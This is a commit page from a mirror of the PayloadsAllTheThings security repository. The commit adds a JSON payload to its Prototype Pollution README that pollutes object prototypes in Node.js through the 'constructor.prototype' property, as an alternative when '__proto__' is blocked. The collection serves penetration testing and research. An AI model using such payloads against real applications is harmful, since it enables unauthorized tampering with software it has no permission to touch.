Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

adding the payload for Polluting the prototype via the constructor property in JSON input

Browse source 
Somtimes `__proto__` property may not work, so adding the payload for Polluting the prototype via the `constructor` property in JSON input
This commit is contained in:
Aftab Sama 2024-01-03 17:24:28 +05:30 committed by GitHub
parent cbc6e78d2a
commit 08063f0830
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
Prototype Pollution/README.md
View file

@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
}
```
Polluting the prototype via the `constructor` property instead.
```js
{
"constructor": {
"prototype": {
"foo": "bar",
"json spaces": 10
}
}
}
```
### Prototype Pollution in URL
@ -176,4 +189,4 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder
* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4)
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)